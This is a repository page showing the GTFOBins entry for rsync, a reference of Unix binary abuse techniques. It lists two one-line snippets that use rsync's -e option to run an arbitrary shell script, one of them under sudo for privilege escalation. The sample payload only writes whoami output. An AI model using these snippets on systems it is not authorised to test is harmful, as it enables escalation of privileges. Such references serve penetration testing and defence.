This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
7822ec33e88c24a0b16db48148ccb9f2848b9cf1
GTFOBins.github.io
/
_gtfobins
/
rsync.md
AlessandroZ
7219385a05
add new ways
2018-08-17 17:16:09 +02:00
341 B
Raw
Blame
History
functions
functions
execute-non-interactive
sudo-enabled
code
echo "whoami > /tmp/whoami" > /tmp/tmpfile rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
code
echo "whoami > /tmp/whoami" > /tmp/tmpfile sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
Reference in New Issue
View Git Blame
Copy Permalink